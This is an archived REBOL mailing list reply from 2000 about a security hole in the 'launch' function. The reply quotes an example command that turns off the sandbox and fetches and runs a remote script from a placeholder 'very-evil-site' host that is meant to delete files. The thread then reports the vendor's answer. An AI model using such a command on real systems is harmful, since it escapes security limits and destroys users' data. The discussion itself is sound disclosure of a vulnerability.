Mailing list home
  Find posts   Help

Latest messageRecent messages

In this thread:
 First
 Prev
 Next
 See whole thread
By msg id:
 Prev: 20 Aug 2000 21:39
 Next: 20 Aug 2000 22:09

Other threads:
 Prev: Objects
 Next: Refinement Help output

Same author:
 Prev: 19 Aug 2000 15:44
 Next: 21 Aug 2000 12:32

 Random message

Indexes:
 By topic
 By date
 By author
 By subject
Join the Mailing List....
AccessibilityAbout / FAQ
Member's loungeContact/FeedbackOther REBOL links
Membership:
member name

password

Remember?

Not a member? Please join
2-May 9:00 UTC
[0.063] 8.842k
Mailing List Archive: 49091 messages
  • Home
  • Script library
  • AltME Archive
  • Mailing list
  • Articles Index
  • Site search
 

[ALLY] Launch security? Re:

From: brian:hawley:bigfoot at: 21-Aug-2000 11:46


Frank ([fsievert--uos--de]) wrote:

>I think that launch is not a really good idea. What happens, when I say
>
>    launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
>
>in my REB site. This would allow me to kick away all of the security,
>wouldn't it?


Yes, it would. I wrote about this last Friday on the rebol list,
message #304082: "A small security hole REBOL, and a huge one!".
Take a look at that thread, it's interesting reading.

In reply, Jeff at REBOL Tech wrote:

>Launch, at least in its present form, will not likely be in
>the regular distribution.  It went out in the windows view
>version by accident.
>
>The security risks of modifiable REBOL code will be best
>dealt with by modules.  Untrusted REBOL code can evaluate in
>a module prevented from affecting the surrounding execution
>environment.


Sounds like good news, doesn't it?

Brian Hawley

1 · 2 · [3] · 4 · 5 · 6 · 7 · 8 · See whole thread